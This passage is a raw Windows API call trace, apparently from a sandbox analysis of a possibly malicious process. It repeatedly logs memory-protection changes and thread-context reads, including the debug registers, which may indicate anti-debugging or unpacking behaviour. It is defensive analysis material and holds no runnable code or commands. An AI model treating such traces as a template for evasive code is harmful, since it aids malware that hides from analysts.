[310]=0x71, [311]=0x3f, [312]=0xe1, [313]=0xee, [314]=0xc1, [315]=0xc4, [316]=0x9c, [317]=0x8, [318]=0x4b, [319]=0x7, [320]=0x2f, [321]=0x16, [322]=0x32, [323]=0x1a, [324]=0xcf, [325]=0xbd, [326]=0xbe, [327]=0xac, [328]=0xdd, [329]=0xaf, [330]=0x35, [331]=0x16, [332]=0xc9, [333]=0x82, [334]=0xaa, [335]=0x5b, [336]=0x32, [337]=0x3c, [338]=0xf4, [339]=0xa0, [340]=0xcd, [341]=0x4f, [342]=0x7f, [343]=0x12, [344]=0x82, [345]=0xd9, [346]=0x5a, [347]=0xe3, [348]=0x9a, [349]=0x1f, [350]=0x48, [351]=0xfd, [352]=0x5d, [353]=0x29, [354]=0xc4, [355]=0xe4, [356]=0x65, [357]=0xef, [358]=0xcb, [359]=0xa4, [360]=0xa4, [361]=0xa7, [362]=0xa7, [363]=0xa2, [364]=0x18, [365]=0xa0, [366]=0x65, [367]=0x74, [368]=0x5b, [369]=0x1f, [370]=0xde, [371]=0xa3, [372]=0x39, [373]=0xb7, [374]=0xa7, [375]=0x8, [376]=0xbc, [377]=0x8b, [378]=0x68, [379]=0xf2, [380]=0xa0, [381]=0xb9, [382]=0x2c, [383]=0xdc, [384]=0x1c, [385]=0x10, [386]=0xf9, [387]=0xe0, [388]=0x7f, [389]=0x19, [390]=0xff, [391]=0x27, [392]=0x67, [393]=0x86, [394]=0x78, [395]=0x7e, [396]=0xf5, [397]=0xef, [398]=0x51, [399]=0xb5, [400]=0x3a, [401]=0xf9, [402]=0x69, [403]=0xbd, [404]=0xae, [405]=0xa9, [406]=0x95, [407]=0x14, [408]=0x4, [409]=0x9a, [410]=0x5b, [411]=0xbf, [412]=0x80, [413]=0x47, [414]=0xe7, [415]=0x9c, [416]=0xe8, [417]=0x4d, [418]=0xfc, [419]=0x4d, [420]=0x67, [421]=0xcd, [422]=0xf9, [423]=0x60, [424]=0x8c, [425]=0xfd, [426]=0xee, [427]=0x33, [428]=0x1a, [429]=0xc3, [430]=0xfb, [431]=0x21, [432]=0xa8, [433]=0xc4, [434]=0x97, [435]=0x5e, [436]=0x75, [437]=0x92, [438]=0xb4, [439]=0x75, [440]=0xd8, [441]=0x1c, [442]=0xc9, [443]=0x47, [444]=0x76, [445]=0xa9, [446]=0xa9, [447]=0x53, [448]=0x33, [449]=0x26, [450]=0x5, [451]=0x2b, [452]=0x36, [453]=0xd6, [454]=0x22, [455]=0x7a, [456]=0x39, [457]=0x8d, [458]=0x1f, [459]=0x36, [460]=0xbe, [461]=0x9a, [462]=0xed, [463]=0x4d, [464]=0x3, [465]=0x5e, [466]=0x81, [467]=0x34, [468]=0x14, [469]=0xf0, [470]=0x17, [471]=0x9d, [472]=0xb8, [473]=0xe0, [474]=0xaf, [475]=0x7d, [476]=0x4a, [477]=0x4, [478]=0x62, [479]=0x15, [480]=0xee, [481]=0x6d, [482]=0x6d, [483]=0x5f, [484]=0x2b, [485]=0x18, [486]=0x98, [487]=0xf8, [488]=0x45, [489]=0x48, [490]=0x56, [491]=0x94, [492]=0x10, [493]=0xc4, [494]=0xf4, [495]=0x88, [496]=0x80, [497]=0x6, [498]=0xf9, [499]=0x7a, [500]=0x5a, [501]=0x9, [502]=0x84, [503]=0x86, [504]=0x79, [505]=0x4a, [506]=0xd0, [507]=0x4d, [508]=0x4, [509]=0xa0, [510]=0xf1, [511]=0xb7))) returned 0x0 [0127.144] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x2dfc7c*=0x448000, NumberOfBytesToProtect=0x2541030, NewAccessProtection=0x4, OldAccessProtection=0x2dfc20 | out: BaseAddress=0x2dfc7c*=0x448000, NumberOfBytesToProtect=0x2541030, OldAccessProtection=0x2dfc20*=0x4) returned 0x0 [0127.150] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2555044 | out: Context=0x2555044*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0xb8, [2]=0x43, [3]=0x23, [4]=0xc1, [5]=0x9b, [6]=0x2, [7]=0xb0, [8]=0xbb, [9]=0x42, [10]=0x22, [11]=0xc2, [12]=0xf7, [13]=0x63, [14]=0x8d, [15]=0x2b, [16]=0xd6, [17]=0x88, [18]=0x1b, [19]=0x63, [20]=0xed, [21]=0xeb, [22]=0x13, [23]=0x27, [24]=0x28, [25]=0x4b, [26]=0xb, [27]=0x1c, [28]=0x40, [29]=0xbe, [30]=0xfd, [31]=0x57, [32]=0xb1, [33]=0xf1, [34]=0xc6, [35]=0xda, [36]=0x58, [37]=0x84, [38]=0x2e, [39]=0x1b, [40]=0x19, [41]=0x8, [42]=0x32, [43]=0xfd, [44]=0x32, [45]=0x4a, [46]=0xc0, [47]=0x38, [48]=0x2f, [49]=0xea, [50]=0x9d, [51]=0xdd, [52]=0xb0, [53]=0x33, [54]=0xe0, [55]=0x3d, [56]=0xe4, [57]=0x28, [58]=0x66, [59]=0xc8, [60]=0x4, [61]=0xa0, [62]=0xcc, [63]=0xd6, [64]=0x9a, [65]=0x16, [66]=0x34, [67]=0x4b, [68]=0x4a, [69]=0x93, [70]=0xc1, [71]=0x23, [72]=0xef, [73]=0xc, [74]=0x41, [75]=0x7c, [76]=0xd1, [77]=0xac, [78]=0x1f, [79]=0x27, [80]=0xc9, [81]=0x3c, [82]=0x70, [83]=0xf9, [84]=0x3b, [85]=0x4b, [86]=0xb, [87]=0x1e, [88]=0x10, [89]=0xf2, [90]=0x40, [91]=0x72, [92]=0xd, [93]=0xc1, [94]=0xd8, [95]=0x16, [96]=0xf7, [97]=0xb5, [98]=0x44, [99]=0xd4, [100]=0x62, [101]=0x55, [102]=0xe6, [103]=0x14, [104]=0x76, [105]=0xa5, [106]=0x8d, [107]=0x40, [108]=0xbc, [109]=0x30, [110]=0xdd, [111]=0x54, [112]=0xa9, [113]=0xe3, [114]=0x14, [115]=0xd6, [116]=0x93, [117]=0xb9, [118]=0x78, [119]=0xfe, [120]=0x7d, [121]=0xb6, [122]=0x2e, [123]=0x8, [124]=0xb7, [125]=0x1f, [126]=0x67, [127]=0x22, [128]=0x57, [129]=0x94, [130]=0x4a, [131]=0x8e, [132]=0x6a, [133]=0x14, [134]=0xb8, [135]=0xeb, [136]=0xa8, [137]=0x85, [138]=0xfe, [139]=0xfa, [140]=0x55, [141]=0xb1, [142]=0xf6, [143]=0x5e, [144]=0x43, [145]=0x62, [146]=0xc5, [147]=0x24, [148]=0x69, [149]=0xc3, [150]=0x16, [151]=0x76, [152]=0xc2, [153]=0x1f, [154]=0x64, [155]=0x65, [156]=0x70, [157]=0xa9, [158]=0x23, [159]=0x24, [160]=0x4c, [161]=0x42, [162]=0x1, [163]=0x1, [164]=0x5e, [165]=0xae, [166]=0x4a, [167]=0x68, [168]=0x64, [169]=0x71, [170]=0xd6, [171]=0x7c, [172]=0x8c, [173]=0xf1, [174]=0xb0, [175]=0xe8, [176]=0x88, [177]=0xaa, [178]=0x16, [179]=0x8b, [180]=0xf, [181]=0x6d, [182]=0xe3, [183]=0xdc, [184]=0x7d, [185]=0x58, [186]=0x40, [187]=0x3, [188]=0xd4, [189]=0xa, [190]=0xca, [191]=0x79, [192]=0x88, [193]=0xba, [194]=0x6, [195]=0x28, [196]=0x59, [197]=0x91, [198]=0x53, [199]=0x3a, [200]=0x4f, [201]=0xc7, [202]=0x94, [203]=0xa2, [204]=0xd6, [205]=0x22, [206]=0xca, [207]=0xea, [208]=0x3, [209]=0x57, [210]=0x58, [211]=0x8, [212]=0xc8, [213]=0x2, [214]=0x9f, [215]=0xba, [216]=0x7, [217]=0xe4, [218]=0xcd, [219]=0x3e, [220]=0xc1, [221]=0xef, [222]=0xca, [223]=0xec, [224]=0xdb, [225]=0xea, [226]=0x39, [227]=0x32, [228]=0xb, [229]=0x1f, [230]=0xe2, [231]=0x9d, [232]=0xc9, [233]=0x80, [234]=0xdf, [235]=0xa9, [236]=0x94, [237]=0xff, [238]=0xc6, [239]=0x34, [240]=0xfc, [241]=0x3c, [242]=0x7b, [243]=0xa5, [244]=0xb6, [245]=0x4a, [246]=0x23, [247]=0xbe, [248]=0x3c, [249]=0xfd, [250]=0x3c, [251]=0x13, [252]=0x4a, [253]=0xce, [254]=0x3b, [255]=0x26, [256]=0x34, [257]=0xa, [258]=0x1e, [259]=0xca, [260]=0xfa, [261]=0x11, [262]=0x73, [263]=0xc7, [264]=0x7c, [265]=0x65, [266]=0x94, [267]=0x2d, [268]=0xa3, [269]=0x9b, [270]=0x90, [271]=0x4a, [272]=0x9c, [273]=0x15, [274]=0xd1, [275]=0x0, [276]=0x71, [277]=0x3, [278]=0xde, [279]=0x2b, [280]=0xc3, [281]=0x95, [282]=0xfb, [283]=0xb6, [284]=0x96, [285]=0xee, [286]=0x77, [287]=0x7d, [288]=0x1c, [289]=0x44, [290]=0x8, [291]=0x94, [292]=0xc, [293]=0xf1, [294]=0xfb, [295]=0x5b, [296]=0x6b, [297]=0x19, [298]=0x43, [299]=0x92, [300]=0x9e, [301]=0xa0, [302]=0x3a, [303]=0x39, [304]=0x70, [305]=0x78, [306]=0xc0, [307]=0xf5, [308]=0xaa, [309]=0xdd, [310]=0x71, [311]=0x3f, [312]=0xe1, [313]=0xee, [314]=0xc1, [315]=0xc4, [316]=0x9c, [317]=0x8, [318]=0x4b, [319]=0x7, [320]=0x2f, [321]=0x16, [322]=0x32, [323]=0x1a, [324]=0xcf, [325]=0xbd, [326]=0xbe, [327]=0xac, [328]=0xdd, [329]=0xaf, [330]=0x35, [331]=0x16, [332]=0xc9, [333]=0x82, [334]=0xaa, [335]=0x5b, [336]=0x32, [337]=0x3c, [338]=0xf4, [339]=0xa0, [340]=0xcd, [341]=0x4f, [342]=0x7f, [343]=0x12, [344]=0x82, [345]=0xd9, [346]=0x5a, [347]=0xe3, [348]=0x9a, [349]=0x1f, [350]=0x48, [351]=0xfd, [352]=0x5d, [353]=0x29, [354]=0xc4, [355]=0xe4, [356]=0x65, [357]=0xef, [358]=0xcb, [359]=0xa4, [360]=0xa4, [361]=0xa7, [362]=0xa7, [363]=0xa2, [364]=0x18, [365]=0xa0, [366]=0x65, [367]=0x74, [368]=0x5b, [369]=0x1f, [370]=0xde, [371]=0xa3, [372]=0x39, [373]=0xb7, [374]=0xa7, [375]=0x8, [376]=0xbc, [377]=0x8b, [378]=0x68, [379]=0xf2, [380]=0xa0, [381]=0xb9, [382]=0x2c, [383]=0xdc, [384]=0x1c, [385]=0x10, [386]=0xf9, [387]=0xe0, [388]=0x7f, [389]=0x19, [390]=0xff, [391]=0x27, [392]=0x67, [393]=0x86, [394]=0x78, [395]=0x7e, [396]=0xf5, [397]=0xef, [398]=0x51, [399]=0xb5, [400]=0x3a, [401]=0xf9, [402]=0x69, [403]=0xbd, [404]=0xae, [405]=0xa9, [406]=0x95, [407]=0x14, [408]=0x4, [409]=0x9a, [410]=0x5b, [411]=0xbf, [412]=0x80, [413]=0x47, [414]=0xe7, [415]=0x9c, [416]=0xe8, [417]=0x4d, [418]=0xfc, [419]=0x4d, [420]=0x67, [421]=0xcd, [422]=0xf9, [423]=0x60, [424]=0x8c, [425]=0xfd, [426]=0xee, [427]=0x33, [428]=0x1a, [429]=0xc3, [430]=0xfb, [431]=0x21, [432]=0xa8, [433]=0xc4, [434]=0x97, [435]=0x5e, [436]=0x75, [437]=0x92, [438]=0xb4, [439]=0x75, [440]=0xd8, [441]=0x1c, [442]=0xc9, [443]=0x47, [444]=0x76, [445]=0xa9, [446]=0xa9, [447]=0x53, [448]=0x33, [449]=0x26, [450]=0x5, [451]=0x2b, [452]=0x36, [453]=0xd6, [454]=0x22, [455]=0x7a, [456]=0x39, [457]=0x8d, [458]=0x1f, [459]=0x36, [460]=0xbe, [461]=0x9a, [462]=0xed, [463]=0x4d, [464]=0x3, [465]=0x5e, [466]=0x81, [467]=0x34, [468]=0x14, [469]=0xf0, [470]=0x17, [471]=0x9d, [472]=0xb8, [473]=0xe0, [474]=0xaf, [475]=0x7d, [476]=0x4a, [477]=0x4, [478]=0x62, [479]=0x15, [480]=0xee, [481]=0x6d, [482]=0x6d, [483]=0x5f, [484]=0x2b, [485]=0x18, [486]=0x98, [487]=0xf8, [488]=0x45, [489]=0x48, [490]=0x56, [491]=0x94, [492]=0x10, [493]=0xc4, [494]=0xf4, [495]=0x88, [496]=0x80, [497]=0x6, [498]=0xf9, [499]=0x7a, [500]=0x5a, [501]=0x9, [502]=0x84, [503]=0x86, [504]=0x79, [505]=0x4a, [506]=0xd0, [507]=0x4d, [508]=0x4, [509]=0xa0, [510]=0xf1, [511]=0xb7))) returned 0x0 [0127.156] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x2dfc7c*=0x44a000, NumberOfBytesToProtect=0x2541058, NewAccessProtection=0x4, OldAccessProtection=0x2dfc20 | out: BaseAddress=0x2dfc7c*=0x44a000, NumberOfBytesToProtect=0x2541058, OldAccessProtection=0x2dfc20*=0x4) returned 0x0 [0127.162] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2555044 | out: Context=0x2555044*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0xb8, [2]=0x43, [3]=0x23, [4]=0xc1, [5]=0x9b, [6]=0x2, [7]=0xb0, [8]=0xbb, [9]=0x42, [10]=0x22, [11]=0xc2, [12]=0xf7, [13]=0x63, [14]=0x8d, [15]=0x2b, [16]=0xd6, [17]=0x88, [18]=0x1b, [19]=0x63, [20]=0xed, [21]=0xeb, [22]=0x13, [23]=0x27, [24]=0x28, [25]=0x4b, [26]=0xb, [27]=0x1c, [28]=0x40, [29]=0xbe, [30]=0xfd, [31]=0x57, [32]=0xb1, [33]=0xf1, [34]=0xc6, [35]=0xda, [36]=0x58, [37]=0x84, [38]=0x2e, [39]=0x1b, [40]=0x19, [41]=0x8, [42]=0x32, [43]=0xfd, [44]=0x32, [45]=0x4a, [46]=0xc0, [47]=0x38, [48]=0x2f, [49]=0xea, [50]=0x9d, [51]=0xdd, [52]=0xb0, [53]=0x33, [54]=0xe0, [55]=0x3d, [56]=0xe4, [57]=0x28, [58]=0x66, [59]=0xc8, [60]=0x4, [61]=0xa0, [62]=0xcc, [63]=0xd6, [64]=0x9a, [65]=0x16, [66]=0x34, [67]=0x4b, [68]=0x4a, [69]=0x93, [70]=0xc1, [71]=0x23, [72]=0xef, [73]=0xc, [74]=0x41, [75]=0x7c, [76]=0xd1, [77]=0xac, [78]=0x1f, [79]=0x27, [80]=0xc9, [81]=0x3c, [82]=0x70, [83]=0xf9, [84]=0x3b, [85]=0x4b, [86]=0xb, [87]=0x1e, [88]=0x10, [89]=0xf2, [90]=0x40, [91]=0x72, [92]=0xd, [93]=0xc1, [94]=0xd8, [95]=0x16, [96]=0xf7, [97]=0xb5, [98]=0x44, [99]=0xd4, [100]=0x62, [101]=0x55, [102]=0xe6, [103]=0x14, [104]=0x76, [105]=0xa5, [106]=0x8d, [107]=0x40, [108]=0xbc, [109]=0x30, [110]=0xdd, [111]=0x54, [112]=0xa9, [113]=0xe3, [114]=0x14, [115]=0xd6, [116]=0x93, [117]=0xb9, [118]=0x78, [119]=0xfe, [120]=0x7d, [121]=0xb6, [122]=0x2e, [123]=0x8, [124]=0xb7, [125]=0x1f, [126]=0x67, [127]=0x22, [128]=0x57, [129]=0x94, [130]=0x4a, [131]=0x8e, [132]=0x6a, [133]=0x14, [134]=0xb8, [135]=0xeb, [136]=0xa8, [137]=0x85, [138]=0xfe, [139]=0xfa, [140]=0x55, [141]=0xb1, [142]=0xf6, [143]=0x5e, [144]=0x43, [145]=0x62, [146]=0xc5, [147]=0x24, [148]=0x69, [149]=0xc3, [150]=0x16, [151]=0x76, [152]=0xc2, [153]=0x1f, [154]=0x64, [155]=0x65, [156]=0x70, [157]=0xa9, [158]=0x23, [159]=0x24, [160]=0x4c, [161]=0x42, [162]=0x1, [163]=0x1, [164]=0x5e, [165]=0xae, [166]=0x4a, [167]=0x68, [168]=0x64, [169]=0x71, [170]=0xd6, [171]=0x7c, [172]=0x8c, [173]=0xf1, [174]=0xb0, [175]=0xe8, [176]=0x88, [177]=0xaa, [178]=0x16, [179]=0x8b, [180]=0xf, [181]=0x6d, [182]=0xe3, [183]=0xdc, [184]=0x7d, [185]=0x58, [186]=0x40, [187]=0x3, [188]=0xd4, [189]=0xa, [190]=0xca, [191]=0x79, [192]=0x88, [193]=0xba, [194]=0x6, [195]=0x28, [196]=0x59, [197]=0x91, [198]=0x53, [199]=0x3a, [200]=0x4f, [201]=0xc7, [202]=0x94, [203]=0xa2, [204]=0xd6, [205]=0x22, [206]=0xca, [207]=0xea, [208]=0x3, [209]=0x57, [210]=0x58, [211]=0x8, [212]=0xc8, [213]=0x2, [214]=0x9f, [215]=0xba, [216]=0x7, [217]=0xe4, [218]=0xcd, [219]=0x3e, [220]=0xc1, [221]=0xef, [222]=0xca, [223]=0xec, [224]=0xdb, [225]=0xea, [226]=0x39, [227]=0x32, [228]=0xb, [229]=0x1f, [230]=0xe2, [231]=0x9d, [232]=0xc9, [233]=0x80, [234]=0xdf, [235]=0xa9, [236]=0x94, [237]=0xff, [238]=0xc6, [239]=0x34, [240]=0xfc, [241]=0x3c, [242]=0x7b, [243]=0xa5, [244]=0xb6, [245]=0x4a, [246]=0x23, [247]=0xbe, [248]=0x3c, [249]=0xfd, [250]=0x3c, [251]=0x13, [252]=0x4a, [253]=0xce, [254]=0x3b, [255]=0x26, [256]=0x34, [257]=0xa, [258]=0x1e, [259]=0xca, [260]=0xfa, [261]=0x11, [262]=0x73, [263]=0xc7, [264]=0x7c, [265]=0x65, [266]=0x94, [267]=0x2d, [268]=0xa3, [269]=0x9b, [270]=0x90, [271]=0x4a, [272]=0x9c, [273]=0x15, [274]=0xd1, [275]=0x0, [276]=0x71, [277]=0x3, [278]=0xde, [279]=0x2b, [280]=0xc3, [281]=0x95, [282]=0xfb, [283]=0xb6, [284]=0x96, [285]=0xee, [286]=0x77, [287]=0x7d, [288]=0x1c, [289]=0x44, [290]=0x8, [291]=0x94, [292]=0xc, [293]=0xf1, [294]=0xfb, [295]=0x5b, [296]=0x6b, [297]=0x19, [298]=0x43, [299]=0x92, [300]=0x9e, [301]=0xa0, [302]=0x3a, [303]=0x39, [304]=0x70, [305]=0x78, [306]=0xc0, [307]=0xf5, [308]=0xaa, [309]=0xdd, [310]=0x71, [311]=0x3f, [312]=0xe1, [313]=0xee, [314]=0xc1, [315]=0xc4, [316]=0x9c, [317]=0x8, [318]=0x4b, [319]=0x7, [320]=0x2f, [321]=0x16, [322]=0x32, [323]=0x1a, [324]=0xcf, [325]=0xbd, [326]=0xbe, [327]=0xac, [328]=0xdd, [329]=0xaf, [330]=0x35, [331]=0x16, [332]=0xc9, [333]=0x82, [334]=0xaa, [335]=0x5b, [336]=0x32, [337]=0x3c, [338]=0xf4, [339]=0xa0, [340]=0xcd, [341]=0x4f, [342]=0x7f, [343]=0x12, [344]=0x82, [345]=0xd9, [346]=0x5a, [347]=0xe3, [348]=0x9a, [349]=0x1f, [350]=0x48, [351]=0xfd, [352]=0x5d, [353]=0x29, [354]=0xc4, [355]=0xe4, [356]=0x65, [357]=0xef, [358]=0xcb, [359]=0xa4, [360]=0xa4, [361]=0xa7, [362]=0xa7, [363]=0xa2, [364]=0x18, [365]=0xa0, [366]=0x65, [367]=0x74, [368]=0x5b, [369]=0x1f, [370]=0xde, [371]=0xa3, [372]=0x39, [373]=0xb7, [374]=0xa7, [375]=0x8, [376]=0xbc, [377]=0x8b, [378]=0x68, [379]=0xf2, [380]=0xa0, [381]=0xb9, [382]=0x2c, [383]=0xdc, [384]=0x1c, [385]=0x10, [386]=0xf9, [387]=0xe0, [388]=0x7f, [389]=0x19, [390]=0xff, [391]=0x27, [392]=0x67, [393]=0x86, [394]=0x78, [395]=0x7e, [396]=0xf5, [397]=0xef, [398]=0x51, [399]=0xb5, [400]=0x3a, [401]=0xf9, [402]=0x69, [403]=0xbd, [404]=0xae, [405]=0xa9, [406]=0x95, [407]=0x14, [408]=0x4, [409]=0x9a, [410]=0x5b, [411]=0xbf, [412]=0x80, [413]=0x47, [414]=0xe7, [415]=0x9c, [416]=0xe8, [417]=0x4d, [418]=0xfc, [419]=0x4d, [420]=0x67, [421]=0xcd, [422]=0xf9, [423]=0x60, [424]=0x8c, [425]=0xfd, [426]=0xee, [427]=0x33, [428]=0x1a, [429]=0xc3, [430]=0xfb, [431]=0x21, [432]=0xa8, [433]=0xc4, [434]=0x97, [435]=0x5e, [436]=0x75, [437]=0x92, [438]=0xb4, [439]=0x75, [440]=0xd8, [441]=0x1c, [442]=0xc9, [443]=0x47, [444]=0x76, [445]=0xa9, [446]=0xa9, [447]=0x53, [448]=0x33, [449]=0x26, [450]=0x5, [451]=0x2b, [452]=0x36, [453]=0xd6, [454]=0x22, [455]=0x7a, [456]=0x39, [457]=0x8d, [458]=0x1f, [459]=0x36, [460]=0xbe, [461]=0x9a, [462]=0xed, [463]=0x4d, [464]=0x3, [465]=0x5e, [466]=0x81, [467]=0x34, [468]=0x14, [469]=0xf0, [470]=0x17, [471]=0x9d, [472]=0xb8, [473]=0xe0, [474]=0xaf, [475]=0x7d, [476]=0x4a, [477]=0x4, [478]=0x62, [479]=0x15, [480]=0xee, [481]=0x6d, [482]=0x6d, [483]=0x5f, [484]=0x2b, [485]=0x18, [486]=0x98, [487]=0xf8, [488]=0x45, [489]=0x48, [490]=0x56, [491]=0x94, [492]=0x10, [493]=0xc4, [494]=0xf4, [495]=0x88, [496]=0x80, [497]=0x6, [498]=0xf9, [499]=0x7a, [500]=0x5a, [501]=0x9, [502]=0x84, [503]=0x86, [504]=0x79, [505]=0x4a, [506]=0xd0, [507]=0x4d, [508]=0x4, [509]=0xa0, [510]=0xf1, [511]=0xb7))) returned 0x0 [0127.167] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x2540800*=0x400000, NumberOfBytesToProtect=0x254080c, NewAccessProtection=0x2, OldAccessProtection=0x2dfc20 | out: BaseAddress=0x2540800*=0x400000, NumberOfBytesToProtect=0x254080c, OldAccessProtection=0x2dfc20*=0x4) returned 0x0 [0127.173] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2555044 | out: Context=0x2555044*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, 